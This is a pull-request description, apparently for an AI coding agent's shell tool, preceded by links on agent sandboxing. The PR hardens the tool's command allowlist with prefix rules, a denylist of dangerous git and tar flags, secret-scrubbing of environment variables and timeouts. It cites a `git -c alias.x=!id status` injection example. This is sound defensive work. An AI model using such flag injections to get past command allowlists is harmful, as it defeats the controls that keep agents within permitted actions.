+  https://heyclau.de/entry/guides/headless-claude-code-automation-from-scripts-and-ci
+- Codex CLI sandbox model (Seatbelt / Landlock+seccomp, no network):
+  https://agent-safehouse.dev/docs/agent-investigations/codex
+- Codex sandbox deep dive (bubblewrap filesystem views, no_new_privs):
+  https://blog.checo.cc/posts/AI/9.html
+- Simon Willison's research index (Codex sandbox analysis):
+  https://github.com/simonw/research


### PR DESCRIPTION
## Summary

Implements Phase 1 of the allowlist hardening research (included here as `docs/allowlist-hardening.md`, decisions D1–D4 settled):

**Allowlist granularity**
- Entries are now argv **prefix rules**: `"git status"` allows exactly that subcommand tree; a bare `"git"` keeps its old meaning (backward compatible). Basename convenience applies to the first token only.

**Dangerous-flag denylist**
- Built-in per-program denylist — git: `-c`, `--exec-path`, `--git-dir`, `--work-tree`; tar: `--checkpoint-action`, `--to-command` — matched in exact / attached-short / `--flag=` forms, scanning stops at `--`. Closes `git -c alias.x=!id status`-style injection.

**Environment scrubbing (deny-by-default)**
- Spawned commands get a fixed PATH (+ `~/.cargo/bin` when present), a minimal keep-list (HOME/TERM/LANG/TMPDIR/CI), and git safety overrides (`GIT_PAGER=cat`, `GIT_CONFIG_NOSYSTEM=1`, `GIT_TERMINAL_PROMPT=0`, editors disabled).
- `CLAUSURA_API_KEY` and `*_KEY` / `*_TOKEN` / `*_SECRET` / `*_PASSWORD` are never forwarded — even via the passthrough knob.
- New `task.shell_env_passthrough` (exact variable names only) for enterprise proxies etc.

**Per-command timeout**
- New `task.shell_timeout_secs` (default 120; env `CLAUSURA_SHELL_TIMEOUT`; CLI `--shell-timeout`). Timed-out commands are killed and reported as a tool result.

**Windows stance**
- Windows support is a documented non-goal (WSL2/Docker), but the code stays Windows-compilable and the CI test matrix gains `windows-latest` to enforce that.

## Verification

- `cargo test --workspace` — 239 green (20 new: prefix rules, denylist, env helper, timeout, config layering)
- `cargo clippy --workspace --all-targets -- -D warnings` / `cargo fmt --check` — clean
- The new windows-latest CI leg is itself validated by this PR's checks
